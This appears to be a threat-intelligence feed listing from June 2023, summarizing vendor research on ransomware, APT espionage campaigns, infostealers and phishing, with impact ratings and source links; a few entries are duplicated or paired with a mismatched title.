The service in question, described on the KrebsOnSecurity blog, is kopeechka[.]store, a kind of unidirectional email confirmation-as-a-service that invites you to “save your time and money for successfully registering multiple accounts.” The service offers to cut the costs associated with large-scale spam and account creation campaigns by paying people to sell their email account credentials and letting customers temporarily rent access to a vast pool of established accounts at major providers.
Source: https://krebsonsecurity.com/2023/06/service-rents-email-addresses-for-account-signups/?replytocom=585549
2023-06-23
Hackers_Using_USB_Driven_Self_Propagating_Malware_to_Attack_the_Camaro_Dragon
MEDIUM
Intel Source:
Checkpoint
Intel Name:
Hackers_Using_USB_Driven_Self_Propagating_Malware_to_Attack_the_Camaro_Dragon
Date of Scan:
2023-06-23
Impact:
MEDIUM
Summary:
Checkpoint researchers have identified that the Chinese cyber espionage actor known as Camaro Dragon is leveraging a new strain of self-propagating malware that spreads through compromised USB drives.
Source: https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
2023-06-23
New_Infection_Strategy_of_Mallox_Ransomware
LOW
Intel Source:
Cyble
Intel Name:
New_Infection_Strategy_of_Mallox_Ransomware
Date of Scan:
2023-06-23
Impact:
LOW
Summary:
Two years ago, a new ransomware known as “TargetCompany” appeared and got a lot of attention due to its unique method of appending the name of the targeted company as a file extension. This ransomware variant was also noticed using a “.mallox” extension for encrypted files, linking it to its previous identification as “Mallox”. Last year, Cyble Research analysts also observed a significant spike in Mallox ransomware samples. Cyble analysts discovered a new variation of the Mallox ransomware that now appends the file extension “.malox” to the encrypted files, whereas previously it used the “.mallox” extension. This ransomware binary is deployed using BatLoader, which is similar to the one previously reported spreading RATs and stealers.
Source: https://blog.cyble.com/2023/06/22/mallox-ransomware-implements-new-infection-strategy/
2023-06-23
New_Infection_Strategy_Implemented_by_Mallox_Ransomware
LOW
Intel Source:
Cyble
Intel Name:
New_Infection_Strategy_Implemented_by_Mallox_Ransomware
Date of Scan:
2023-06-23
Impact:
LOW
Summary:
Cyble researchers have observed a new variation of the Mallox ransomware that now appends the file extension .malox to the encrypted files, whereas previously it used the .mallox extension. This ransomware binary is deployed using BatLoader, which is similar to the one previously reported spreading RATs and stealers.
Source: https://blog.cyble.com/2023/06/22/mallox-ransomware-implements-new-infection-strategy/
2023-06-23
Cryptocurrency_Mining_Campaigns_Targeting_Linux_and_IoT_Devices
LOW
Intel Source:
Microsoft
Intel Name:
Cryptocurrency_Mining_Campaigns_Targeting_Linux_and_IoT_Devices
Date of Scan:
2023-06-23
Impact:
LOW
Summary:
Microsoft researchers have identified that Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency.
Source: https://www.microsoft.com/en-us/security/blog/2023/06/22/iot-devices-and-linux-based-systems-targeted-by-openssh-trojan-campaign/
2023-06-23
An_Overview_of_Trigona_Ransomware_Various_Versions
LOW
Intel Source:
TrendMicro
Intel Name:
An_Overview_of_Trigona_Ransomware_Various_Versions
Date of Scan:
2023-06-23
Impact:
LOW
Summary:
The Trigona ransomware is a relatively new ransomware family that began activities around late October 2022 — although samples of it existed as early as June 2022. Since then, Trigona’s operators have remained highly active, and in fact, have been continuously updating their ransomware binaries.
Source: https://www.trendmicro.com/en_us/research/23/f/an-overview-of-the-trigona-ransomware.html
2023-06-23
Multiple_IoT_Exploits_Used_in_Latest_Mirai_Campaign
LOW
Intel Source:
PaloAlto
Intel Name:
Multiple_IoT_Exploits_Used_in_Latest_Mirai_Campaign
Date of Scan:
2023-06-23
Impact:
LOW
Summary:
Paloalto researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet.
Source: https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/
2023-06-22
Kimsuky_Distributing_CHM_Malware
LOW
Intel Source:
ASEC
Intel Name:
Kimsuky_Distributing_CHM_Malware
Date of Scan:
2023-06-22
Impact:
LOW
Summary:
ASEC researchers have continuously tracked the Kimsuky group’s APT attacks. While the Kimsuky group often used document files for malware distribution, there have been many recent cases where CHM files were used in distribution. Also, unlike in the past when the document files contained North Korea-related topics, the group is now attempting to attack using a variety of subjects.
Source: https://asec.ahnlab.com/en/54678/
2023-06-22
Chinese_Hacking_Group_Flea_Targeting_American_Ministries
MEDIUM
Intel Source:
Symantec
Intel Name:
Chinese_Hacking_Group_Flea_Targeting_American_Ministries
Date of Scan:
2023-06-22
Impact:
MEDIUM
Summary:
Symantec researchers have identified that a Chinese state-sponsored actor named Flea has been targeting foreign affairs ministries in the Americas as part of a recent campaign that spanned from late 2022 to early 2023.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/flea-backdoor-microsoft-graph-apt15
2023-06-22
Condi_DDoS_Botnet_Spreading_Through_TP_Link_Vulnerability
LOW
Intel Source:
Fortinet
Intel Name:
Condi_DDoS_Botnet_Spreading_Through_TP_Link_Vulnerability
Date of Scan:
2023-06-22
Impact:
LOW
Summary:
Fortinet researchers have observed that a new DDoS-as-a-Service botnet called "Condi" emerged in May 2023, exploiting a vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to build an army of bots to conduct attacks.
Source: https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389
2023-06-22
The_Examination_of_Ransomware_With_BAT_File_Extension_Attacking_MS_SQL_Servers
LOW
Intel Source:
ASEC
Intel Name:
The_Examination_of_Ransomware_With_BAT_File_Extension_Attacking_MS_SQL_Servers
Date of Scan:
2023-06-22
Impact:
LOW
Summary:
ASEC researchers have discovered the Mallox ransomware with the BAT file extension being distributed to poorly managed MS-SQL servers. Extensions of files distributed to poorly managed MS-SQL servers include not only EXE but also BAT, which is a fileless format. The files with the BAT file extension discovered so far are Remcos RAT and Mallox.
Source: https://asec.ahnlab.com/en/54704/
2023-06-22
New_MULTI_STORM_Attack_Campaign_by_Python_Loader
MEDIUM
Intel Source:
Securonix Threat Labs
Intel Name:
New_MULTI_STORM_Attack_Campaign_by_Python_Loader
Date of Scan:
2023-06-22
Impact:
MEDIUM
Summary:
An interesting phishing campaign was recently analyzed by the Securonix Threat Research Team. The attack kicks off when the user clicks on a heavily obfuscated JavaScript file contained in a password protected zip file. The attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances, such as Warzone RAT and Quasar RAT. Both are used for command and control during different stages of the infection chain.
Source: https://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/
2023-06-22
RedEyes_Group_Wiretapping_Individuals
LOW
Intel Source:
ASEC
Intel Name:
RedEyes_Group_Wiretapping_Individuals
Date of Scan:
2023-06-22
Impact:
LOW
Summary:
ASEC researchers have discovered that RedEyes (APT37), a state-sponsored APT group, is targeting individuals. They recently used an Infostealer with wiretapping capabilities and a GoLang backdoor. Spear phishing emails were used for initial access, and the Ably platform for command and control. Privilege escalation techniques were employed, and an Infostealer named FadeStealer stole data and wiretapped microphones.
Source: https://asec.ahnlab.com/en/54349/
2023-06-22
APT28_Group_Leveraging_Three_Roundcube_Exploits
LOW
Intel Source:
CERT-UA
Intel Name:
APT28_Group_Leveraging_Three_Roundcube_Exploits
Date of Scan:
2023-06-22
Impact:
LOW
Summary:
CERT-UA researchers have discovered that APT28 utilized three exploits targeting Roundcube (CVE-2020-35730, CVE-2021-44026, CVE-2020-12641) during a recent espionage campaign against a Ukrainian government organization. The attack involved malicious emails containing exploit code and JavaScript files for exfiltration.
Source: https://cert.gov.ua/article/4905829
2023-06-22
Evaluation_of_Threat_Group_Muddled_Libra
LOW
Intel Source:
PaloAlto
Intel Name:
Evaluation_of_Threat_Group_Muddled_Libra
Date of Scan:
2023-06-22
Impact:
LOW
Summary:
PaloAlto researchers have identified that a new threat group dubbed "Muddled Libra" is targeting large outsourcing firms with multi-layered, persistent attacks that start with smishing and end with data theft. The group is also using the infrastructure that it compromises in downstream attacks on victims' customers.
Source: https://unit42.paloaltonetworks.com/muddled-libra/
2023-06-21
New_Ransomware_Variant_Big_Head
LOW
Intel Source:
Fortinet
Intel Name:
New_Ransomware_Variant_Big_Head
Date of Scan:
2023-06-21
Impact:
LOW
Summary:
FortiGuard Labs have recently come across a new ransomware variant called Big Head, which came out in May 2023. Although there are at least three variants of Big Head ransomware, all are designed to encrypt files on victims’ machines to extort money, like other ransomware variants.
Source: https://www.fortinet.com/blog/threat-research/fortiguard-labs-ransomware-roundup-big-head
2023-06-21
The_Aesi_Return_with_Darth_Vidar
LOW
Intel Source:
Team Cymru
Intel Name:
The_Aesi_Return_with_Darth_Vidar
Date of Scan:
2023-06-21
Impact:
LOW
Summary:
Researchers from Team-Cymru have observed that Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia.
Source: https://www.team-cymru.com/post/darth-vidar-the-aesir-strike-back
2023-06-21
DcRAT_a_clone_of_AsyncRAT
LOW
Intel Source:
Esentire
Intel Name:
DcRAT_a_clone_of_AsyncRAT
Date of Scan:
2023-06-21
Impact:
LOW
Summary:
In May 2023, eSentire identified DcRAT, a clone of AsyncRAT, at a consumer services customer. DcRAT is a remote access tool with info-stealing and ransomware capabilities. The malware is actively distributed using explicit lures for OnlyFans pages and other adult content.
Source: https://www.esentire.com/blog/onlydcratfans-malware-distributed-using-explicit-lures-of-onlyfans-pages-and-other-adult-content
2023-06-21
ASEC_Weekly_Phishing_Email_analysis_June_4_10_2023
LOW
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Phishing_Email_analysis_June_4_10_2023
Date of Scan:
2023-06-21
Impact:
LOW
Summary:
The ASEC analysis team keeps monitoring phishing email threats with their automatic sample analysis system (RAPIT) and honeypot. Their post covers the cases of distribution of phishing emails during the week from June 4th, 2023 to June 10th, 2023 and provides statistical information on each type.
Source: https://asec.ahnlab.com/en/54662/
2023-06-21
Attackers_Abusing_Legitimate_Services_For_Credential_Theft
LOW
Intel Source:
Checkpoint
Intel Name:
Attackers_Abusing_Legitimate_Services_For_Credential_Theft
Date of Scan:
2023-06-21
Impact:
LOW
Summary:
Check Point researchers have detected an ongoing phishing campaign that uses legitimate services for credential harvesting and data exfiltration in order to evade detection.
Source: https://blog.checkpoint.com/security/sign-in-to-continue-and-suffer-attackers-abusing-legitimate-services-for-credential-theft/
2023-06-21
The_Analysis_of_Resident_Campaign
LOW
Intel Source:
eSentire
Intel Name:
The_Analysis_of_Resident_Campaign
Date of Scan:
2023-06-21
Impact:
LOW
Summary:
eSentire researchers have observed the resurgence of what they believe to be a malicious campaign targeting manufacturing, commercial, and healthcare organizations.
Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
2023-06-21
Hackers_Running_an_Active_Cryptojacking_Campaign
LOW
Intel Source:
Bitdefender
Intel Name:
Hackers_Running_an_Active_Cryptojacking_Campaign
Date of Scan:
2023-06-21
Impact:
LOW
Summary:
Bitdefender security researchers have discovered a threat group likely based in Romania that's been active since at least 2020. They've been targeting Linux-based machines with weak SSH credentials, mainly to deploy Monero mining malware, but their toolbox allows for other kinds of attacks.
Source: https://www.bitdefender.co.uk/blog/labs/how-we-tracked-a-threat-group-running-an-active-cryptojacking-campaign/
2023-06-21
New_Malware_Campaign_Targeting_LetsVPN_Users
LOW
Intel Source:
Cyble
Intel Name:
New_Malware_Campaign_Targeting_LetsVPN_Users
Date of Scan:
2023-06-21
Impact:
LOW
Summary:
Cyble researchers have discovered the existence of numerous counterfeit LetsVPN websites while conducting a routine threat-hunting exercise. These fraudulent sites share a common user interface and are deliberately designed to distribute malware, masquerading as the genuine LetsVPN application.
Source: https://blog.cyble.com/2023/06/16/new-malware-campaign-targets-letsvpn-users/
2023-06-21
Aurora_Stealer_malware_analysis
LOW
Intel Source:
Esentire
Intel Name:
Aurora_Stealer_malware_analysis
Date of Scan:
2023-06-21
Impact:
LOW
Summary:
The post discusses the Aurora Stealer malware targeting the manufacturing industry through fake downloads distributed via Google Ads. The malware gathers sensitive data, is sold under a pricing plan, and is written in the Go programming language. The post also provides indicators of compromise and recommendations for protection against the malware.
Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-aurora-stealer
2023-06-21
Disguised_malware_as_a_security_update_installer
LOW
Intel Source:
ASEC
Intel Name:
Disguised_malware_as_a_security_update_installer
Date of Scan:
2023-06-21
Impact:
LOW
Summary:
AhnLab recently discovered the attack of a hacking group that is supported by a certain government. The discovered malware disguised itself as a security update installer and was developed using the Inno Setup software.
Source: https://asec.ahnlab.com/en/54375/
2023-06-20
Hackers_Targeting_Middle_Eastern_and_African_Governments_with_Advanced_Techniques
MEDIUM
Intel Source:
PaloAlto
Intel Name:
Hackers_Targeting_Middle_Eastern_and_African_Governments_with_Advanced_Techniques
Date of Scan:
2023-06-20
Impact:
MEDIUM
Summary:
PaloAlto researchers have identified that governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques.
Source: https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/
2023-06-20
Tsunami_DDoS_Malware_Distributing_to_Linux_SSH_Servers
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Tsunami_DDoS_Malware_Distributing_to_Linux_SSH_Servers
Date of Scan:
2023-06-20
Impact:
MEDIUM
Summary:
ASEC researchers have discovered an attack campaign that consists of the Tsunami DDoS Bot being installed on inadequately managed Linux SSH servers. Not only did the threat actor install Tsunami, but they also installed various other malware such as ShellBot, XMRig CoinMiner, and Log Cleaner.
Source: https://asec.ahnlab.com/en/54647/
2023-06-20
RecordBreaker_Infostealer_Disguised_as_a_Dot_NET_Installer
LOW
+
Intel Source:
ASEC
Intel Name:
RecordBreaker_Infostealer_Disguised_as_a_Dot_NET_Installer
Date of Scan:
2023-06-20
Impact:
LOW
Summary:
ASEC researchers have observed an encrypted malware file being downloaded from the threat actor's server and executed. In this instance the payload is the RecordBreaker (Raccoon Stealer V2) infostealer.
Source: https://asec.ahnlab.com/en/54658/
2023-06-20
The_Aesir_Return_with_Darth_Vidar
LOW
+
Intel Source:
Bitdefender
Intel Name:
The_Aesir_Return_with_Darth_Vidar
Date of Scan:
2023-06-20
Impact:
LOW
Summary:
Bitdefender researchers have described the behaviors observed in a recent incident they investigated, in which a presumably custom malware tracked as the Logutil backdoor was deployed. The operation was active for more than a year with the end goal of compromising credentials and exfiltrating data.
Source: https://www.bitdefender.com/files/News/CaseStudies/study/431/Bitdefender-Labs-Report-X-creat6958-en-EN.pdf
2023-06-20
Malware_Delivering_Through_Dot_inf_File
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Malware_Delivering_Through_Dot_inf_File
Date of Scan:
2023-06-20
Impact:
LOW
Summary:
Researchers from SANS have analyzed .inf files and observed them being used to deliver malware.
Source: https://isc.sans.edu/diary/rss/29960
2023-06-19
Formbook_From_Possible_ModiLoader
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Formbook_From_Possible_ModiLoader
Date of Scan:
2023-06-19
Impact:
LOW
Summary:
Researchers from SANS have analyzed the recent Formbook samples and came across an example that kicks off with an Excel file exploiting CVE-2017-11882 to use what seems like ModiLoader (also known as DBatLoader).
Source: https://isc.sans.edu/diary/rss/29958
2023-06-19
Cyberattacks_Against_Users_of_UKR_NET_Service
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
Cyberattacks_Against_Users_of_UKR_NET_Service
Date of Scan:
2023-06-19
Impact:
MEDIUM
Summary:
CERT-UA received, from a participant in its information exchange, an e-mail with the subject "Suspicious activity observed @UKR.NET" and an attachment in the form of a PDF file, "Security warning.pdf", sent apparently on behalf of UKR.NET technical support. The PDF document contains a link to a fraudulent web resource that imitates the web page of the mail service.
Source: https://cert.gov.ua/article/4928679
2023-06-19
GhostWriter_Group_Targeting_State_Organization_of_Ukraine
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
GhostWriter_Group_Targeting_State_Organization_of_Ukraine
Date of Scan:
2023-06-19
Impact:
MEDIUM
Summary:
CERT-UA researchers have discovered the PPT document "daewdfq342r.ppt", which contains a macro and a thumbnail image with the emblem of the National Defense University of Ukraine named after Ivan Chernyakhivskyi.
Source: https://cert.gov.ua/article/4905718
2023-06-19
RAT_Delivering_Through_VBS
LOW
+
Intel Source:
ISC.SANS
Intel Name:
RAT_Delivering_Through_VBS
Date of Scan:
2023-06-19
Impact:
LOW
Summary:
Researchers from SANS have observed a RAT being delivered via VBS.
Source: https://isc.sans.edu/diary/rss/29956
2023-06-18
An_Evolving_Stealer_Called_Mystic
LOW
+
Intel Source:
Cyfirma
Intel Name:
An_Evolving_Stealer_Called_Mystic
Date of Scan:
2023-06-18
Impact:
LOW
Summary:
CYFIRMA's research team recently discovered an information stealer called Mystic Stealer being promoted on an underground forum, with the threat actor using a Telegram channel for their operations.
Source: https://www.cyfirma.com/outofband/mystic-stealer-evolving-stealth-malware/
2023-06-17
Analazying_a_global_adversary_in_the_middle_campaign
LOW
+
Intel Source:
Sygnia
Intel Name:
Analazying_a_global_adversary_in_the_middle_campaign
Date of Scan:
2023-06-17
Impact:
LOW
Summary:
At the beginning of this year, Sygnia's IR team investigated and analyzed a Business Email Compromise (BEC) attack against one of its clients. The threat actor gained initial access to one of the victim's employee accounts and executed an 'Adversary In The Middle' attack to bypass Office365 authentication and gain persistent access to that account. After getting access, the threat actor exfiltrated data from the compromised account and used that access to spread phishing attacks to other employees of the victim along with several external targeted organizations.
Source: https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit
2023-06-17
An_Emerging_Romanian_Threat_Actor_Named_Diicot
LOW
+
Intel Source:
CADO Security
Intel Name:
An_Emerging_Romanian_Threat_Actor_Named_Diicot
Date of Scan:
2023-06-17
Impact:
LOW
Summary:
Cado Security researchers have identified an interesting attack pattern that could be attributed to the threat actor Diicot (formerly "Mexals").
Source: https://www.cadosecurity.com/tracking-diicot-an-emerging-romanian-threat-actor/
2023-06-17
Long_Running_Shuckworm_Intrusions_Against_Ukrainian_Organizations
LOW
+
Intel Source:
Symantec
Intel Name:
Long_Running_Shuckworm_Intrusions_Against_Ukrainian_Organizations
Date of Scan:
2023-06-17
Impact:
LOW
Summary:
Symantec researchers have identified that the Russian threat actor known as Shuckworm has continued its cyber assault spree against Ukrainian entities in a bid to steal sensitive information from compromised environments.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military
2023-06-17
MultiStage_Phishing_Attac_Targeted_Xneelo_Users
LOW
+
Intel Source:
Cofense
Intel Name:
MultiStage_Phishing_Attac_Targeted_Xneelo_Users
Date of Scan:
2023-06-17
Impact:
LOW
Summary:
Cofense researchers have observed a multi-stage phishing campaign targeting Xneelo customers, involving a fake KonsoleH login page used to obtain login details, credit card information, and SMS 2FA codes.
Source: https://cofense.com/blog/xneelo-users-targeted-in-a-multi-stage-phishing-attack/
2023-06-17
Chinese_Hackers_Using_DNS_Over_HTTPS_For_Linux_Malware_Communication
LOW
+
Intel Source:
Stairwell
Intel Name:
Chinese_Hackers_Using_DNS_Over_HTTPS_For_Linux_Malware_Communication
Date of Scan:
2023-06-17
Impact:
LOW
Summary:
Researchers from Stairwell have observed the Chinese threat group 'ChamelGang' infecting Linux devices with a previously unknown implant named 'ChamelDoH', which communicates with the attackers' servers over DNS-over-HTTPS.
Source: https://stairwell.com/news/chamelgang-and-chameldoh-a-dns-over-https-implant/
2023-06-17
Supply_Chain_Attackers_Exploiting_New_Technique
LOW
+
Intel Source:
Checkmarx
Intel Name:
Supply_Chain_Attackers_Exploiting_New_Technique
Date of Scan:
2023-06-17
Impact:
LOW
Summary:
Checkmarx researchers have identified a new technique used by supply chain attackers to hijack S3 buckets.
Source: https://checkmarx.com/blog/hijacking-s3-buckets-new-attack-technique-exploited-in-the-wild-by-supply-chain-attackers/
2023-06-16
Lazarus_group_exploiting_Korean_finance_security_solution_vulnerability
LOW
+
Intel Source:
ASEC
Intel Name:
Lazarus_group_exploiting_Korean_finance_security_solution_vulnerability
Date of Scan:
2023-06-16
Impact:
LOW
Summary:
The ASEC team has observed the Lazarus threat group exploiting new vulnerabilities in VestCert and TCO!Stream. The affected software should be updated promptly to mitigate the risk, and security measures against advanced threats strengthened.
Source: https://asec.ahnlab.com/en/54195/
2023-06-16
A_New_ChromeLoader_Campaign_Named_Shampoo
MEDIUM
+
Intel Source:
HP Wolf Security
Intel Name:
A_New_ChromeLoader_Campaign_Named_Shampoo
Date of Scan:
2023-06-16
Impact:
MEDIUM
Summary:
HP Wolf Security has detected a new malware campaign, "Shampoo", that uses a malicious ChromeLoader browser extension. The extension steals sensitive information, injects ads, and is difficult to remove.
Source: https://threatresearch.ext.hp.com/shampoo-a-new-chromeloader-campaign/
2023-06-16
Netskope_DL_based_Inline_Phishing_Detection
LOW
+
Intel Source:
Netskope
Intel Name:
Netskope_DL_based_Inline_Phishing_Detection
Date of Scan:
2023-06-16
Impact:
LOW
Summary:
Netskope Threat Labs compare ChatGPT, which facilitates natural language processing and communication, with Netskope's Inline Phishing Detection, which focuses on identifying and blocking phishing attacks in real time.
Source: https://www.netskope.com/blog/heres-what-chatgpt-and-netskopes-inline-phishing-detection-have-in-common
2023-06-16
Phishing_Attacks_Using_HTML_Attachments
LOW
+
Intel Source:
Trellix
Intel Name:
Phishing_Attacks_Using_HTML_Attachments
Date of Scan:
2023-06-16
Impact:
LOW
Summary:
Trellix researchers have identified that phishing attacks using HTML attachments are increasing rapidly, targeting industries worldwide with obfuscation and evasion techniques, which calls for heightened vigilance and strong email security measures.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/the-anatomy-of-html-attachment-phishing.html
2023-06-15
Introducing_Cadet_Blizzard_as_a_Significant_New_Russian_Threat_Actor
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Introducing_Cadet_Blizzard_as_a_Significant_New_Russian_Threat_Actor
Date of Scan:
2023-06-15
Impact:
MEDIUM
Summary:
Microsoft researchers have updated details about techniques of a threat actor formerly tracked as DEV-0586—a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard.
Source: https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/
2023-06-14
A_Look_into_Earth_Preta_Hidden_Working
LOW
+
Intel Source:
TrendMicro
Intel Name:
A_Look_into_Earth_Preta_Hidden_Working
Date of Scan:
2023-06-14
Impact:
LOW
Summary:
TrendMicro researchers have discussed the more technical details of the most recent tools, techniques, and procedures (TTPs) leveraged by the Earth Preta APT group.
Source: https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html
2023-06-14
Analyzing_a_global_adversary_in_the_middle_campaign
LOW
+
Intel Source:
Sygnia
Intel Name:
Analyzing_a_global_adversary_in_the_middle_campaign
Date of Scan:
2023-06-14
Impact:
LOW
Summary:
At the beginning of this year, Sygnia's IR team investigated and analyzed a Business Email Compromise (BEC) attack against one of its clients. The threat actor gained initial access to one of the victim's employee accounts and executed an 'Adversary In The Middle' attack to bypass Office365 authentication and gain persistent access to that account. After getting access, the threat actor exfiltrated data from the compromised account and used that access to spread phishing attacks to other employees of the victim along with several external targeted organizations.
Source: https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit
2023-06-14
New_Golang_Based_Skuld_Malware
MEDIUM
+
Intel Source:
Trellix
Intel Name:
New_Golang_Based_Skuld_Malware
Date of Scan:
2023-06-14
Impact:
MEDIUM
Summary:
Trellix researchers have identified a new Golang-based information stealer called Skuld that has compromised Windows systems across Europe, Southeast Asia, and the US.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/skuld-the-infostealer-that-speaks-golang.html
2023-06-14
The_risks_of_zip_and_mov_domains
LOW
+
Intel Source:
Netscope
Intel Name:
The_risks_of_zip_and_mov_domains
Date of Scan:
2023-06-14
Impact:
LOW
Summary:
Some time ago Google introduced and announced eight new top-level domains. Two of them (.zip and .mov) have raised concern because they match well-known file extensions. Neither the .zip nor the .mov TLD is new, as both have been available since 2014. The main threat is that anyone can now own a .zip or .mov domain at a low price and exploit it for social engineering: attackers can craft URLs that appear to deliver ZIP and MOV files but instead redirect victims to malicious websites.
Source: https://www.netskope.com/blog/zip-and-mov-top-level-domain-abuse-one-month-after-being-made-public
2023-06-14
Pirated_Windows_10_ISOs_Install_Clipper_Malware
MEDIUM
+
Intel Source:
Dr.WEB
Intel Name:
Pirated_Windows_10_ISOs_Install_Clipper_Malware
Date of Scan:
2023-06-14
Impact:
MEDIUM
Summary:
Dr.WEB researchers have identified that hackers are distributing Windows 10 using torrents that hide cryptocurrency hijackers in the EFI (Extensible Firmware Interface) partition to evade detection.
Source: https://news.drweb.com/show/?i=14712&lng=en
2023-06-14
WannaCry_Imitator_targets_Russian_Gaming_Community
MEDIUM
+
Intel Source:
Cyble
Intel Name:
WannaCry_Imitator_targets_Russian_Gaming_Community
Date of Scan:
2023-06-14
Impact:
MEDIUM
Summary:
Cyble researchers recently observed phishing campaigns that use gaming sites as a distribution channel for various malware families. They discovered a phishing campaign targeting Russian-speaking gamers in order to distribute ransomware. The fake website offers a file that contains a legitimate game installer bundled with ransomware. The ransomware uses the name "WannaCry 3.0" and the "wncry" file extension for encrypted files, although it is not an original variant of the WannaCry ransomware. It is a modified version of the open-source ransomware "Crypter", developed for Windows and written purely in Python.
Source: https://blog.cyble.com/2023/06/13/threat-actor-targets-russian-gaming-community-with-wannacry-imitator/
2023-06-13
Multistage_DoubleFinger_loads_GreetingGhoul_stealer
LOW
+
Intel Source:
Securelist
Intel Name:
Multistage_DoubleFinger_loads_GreetingGhoul_stealer
Date of Scan:
2023-06-13
Impact:
LOW
Summary:
Securelist shared their analysis of the multi-stage DoubleFinger loader delivering a cryptocurrency stealer. DoubleFinger is deployed on the target machine when the victim opens a malicious PIF attachment in an email message, which executes the first of DoubleFinger's loader stages.
Source: https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/
2023-06-13
ASEC_Weekly_Phishing_Threats_analyses_May_28_June_3_20
LOW
+
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Phishing_Threats_analyses_May_28_June_3_20
Date of Scan:
2023-06-13
Impact:
LOW
Summary:
The ASEC analysis team continuously monitors phishing email threats with its system and honeypot. This article describes the distribution of phishing emails during the week from May 28th to June 3rd, 2023 and provides statistical information on each type.
Source: https://asec.ahnlab.com/en/54163/
2023-06-13
Diving_Deep_into_Pikabot_Cyber_Threat
LOW
+
Intel Source:
Sophos
Intel Name:
Diving_Deep_into_Pikabot_Cyber_Threat
Date of Scan:
2023-06-13
Impact:
LOW
Summary:
Sophos researchers have analyzed the Pikabot malware. Pikabot is a modular trojan acting as a backdoor, allowing unauthorized remote access and executing diverse commands received from a command-and-control server, with the potential for multi-staged attacks.
Source: https://news.sophos.com/en-us/2023/06/12/deep-dive-into-the-pikabot-cyber-threat/
2023-06-12
Undetected_PowerShell_Backdoor
LOW
+
Intel Source:
ISC. SANS
Intel Name:
Undetected_PowerShell_Backdoor
Date of Scan:
2023-06-12
Impact:
LOW
Summary:
ISC SANS researcher Xavier Mertens found a script that scored 0/59 on VT and provided the details of his findings. The file was found with the name "Microsoft.PowerShell_profile.ps1". The attacker chose that name because it is a familiar name used by Microsoft to manage PowerShell profiles.
Source: https://isc.sans.edu/diary/Undetected%20PowerShell%20Backdoor%20Disguised%20as%20a%20Profile%20File/29930
2023-06-12
Satacom_malware_steals_cryptocurrency
LOW
+
Intel Source:
Securelist
Intel Name:
Satacom_malware_steals_cryptocurrency
Date of Scan:
2023-06-12
Impact:
LOW
Summary:
Securelist shared their analysis of a recent malware distribution campaign involving the Satacom downloader, also known as LegionLoader, a renewed malware family that has been around since 2019. The main goal of the malware dropped by the Satacom downloader is to steal BTC from the victim's account by performing web injections into targeted cryptocurrency websites. The malware tries to install an extension for Chromium-based web browsers, which later communicates with its C2 server, whose address is stored in BTC transaction data.
Source: https://securelist.com/satacom-delivers-cryptocurrency-stealing-browser-extension/109807/
2023-06-12
Truebot_Using_Cobalt_Strike_and_FlawedGrace
LOW
+
Intel Source:
DFIR Report
Intel Name:
Truebot_Using_Cobalt_Strike_and_FlawedGrace
Date of Scan:
2023-06-12
Impact:
LOW
Summary:
The DFIR Report researchers have identified Truebot being delivered through a Traffic Distribution System. This campaign, observed in May 2023, used email as the initial delivery mechanism. After clicking the link in an email, the victim was redirected through a series of URLs before being presented with a file download on the final landing page.
Source: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
2023-06-12
Hackers_Targeting_Vietnamese_Public_Companies_With_SPECTRALVIPER_Backdoor
LOW
+
Intel Source:
Elastic
Intel Name:
Hackers_Targeting_Vietnamese_Public_Companies_With_SPECTRALVIPER_Backdoor
Date of Scan:
2023-06-12
Impact:
LOW
Summary:
Researchers from Elastic have identified an ongoing campaign that deploys a novel backdoor called SPECTRALVIPER which is targeting Vietnamese public companies. It is a heavily obfuscated, previously undisclosed, x64 backdoor that brings PE loading and injection, file upload and download, file and directory manipulation, and token impersonation capabilities.
Source: https://www.elastic.co/security-labs/elastic-charms-spectralviper
2023-06-12
Darkrace_Ransomware_Resembles_LockBit_Ransomware
LOW
+
Intel Source:
Cyble
Intel Name:
Darkrace_Ransomware_Resembles_LockBit_Ransomware
Date of Scan:
2023-06-12
Impact:
LOW
Summary:
Cyble researchers have discovered a new ransomware named Darkrace which has similarities with Lockbit Ransomware. It is specifically targeting Windows operating systems and exhibits several similarities to the LockBit ransomware, including the deployment of batch files to terminate processes, the dropping of file icons, and the utilization of random encryption extensions.
Source: https://blog.cyble.com/2023/06/08/unmasking-the-darkrace-ransomware-gang/
2023-06-12
Activity_of_DShield_Honeypot
LOW
+
